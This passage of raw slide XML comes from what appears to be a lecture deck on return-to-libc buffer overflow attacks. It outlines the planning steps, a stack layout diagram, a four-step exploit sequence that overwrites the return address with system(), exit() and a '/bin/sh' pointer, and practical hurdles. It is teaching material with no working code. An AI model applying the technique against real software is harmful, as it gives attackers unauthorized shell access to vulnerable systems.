                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Basic planning process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determine address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>determine address of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh" in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>determine address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Shape 426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="1807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lang="en"/>
              <a:t>vuln buffer</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lang="en"/>
              <a:t>stack data .....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EBP</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lang="en"/>
              <a:t>ret addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument1</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lang="en"/>
              <a:t>argument2 ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="427" name="Shape 427"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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28" name="Shape 428"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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29" name="Shape 429"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4074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30" name="Shape 430"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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31" name="Shape 431"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4988775" x="6881325"/>
            <a:ext cy="0" cx="1819500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Shape 432"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="1376100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Shape 433"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="55867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434" name="Shape 434"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="22339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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Shape 439"/>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Return to lib c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 44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sz="2400" lang="en"/>
              <a:t>Basic execution of exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>fill up the vulnerable buffer up to the return address with garbage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>overwrite the return address with the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>follow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>() with the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>append the address of  "</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>Its simple and sweet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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Shape 44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When function calls happen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 44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In general,    CALL function_name   does the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pushes in order on the stack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>first the arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>then return address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>then base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="1807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a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vuln buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stack data .....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ret addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument2 ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="448" name="Shape 448"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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49" name="Shape 449"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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50" name="Shape 450"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4074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51" name="Shape 451"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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52" name="Shape 452"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4988775" x="6881325"/>
            <a:ext cy="0" cx="1819500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Shape 453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="1376100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Shape 454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="55867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455" name="Shape 455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="22339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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4093800" x="8700800"/>
            <a:ext cy="1376275" cx="209925"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="8397" extrusionOk="0" h="55051">
                <a:moveTo>
                  <a:pt y="0" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="7931" x="8397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="45254" x="8397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="55051" x="466"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Shape 46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Return to lib c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 46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t>Hurdles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>finding "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not uncommon, and can be found  with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a memory analyzer (i.e. memfetch)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can be an environment variable!   :D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>figuring out how to pass it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>arguments get pushed onto the stack in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reverse order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pass a pointer to "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" or put it there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>usually easier to pass a pointer!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>getting the vulnerable process to exit cleanly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
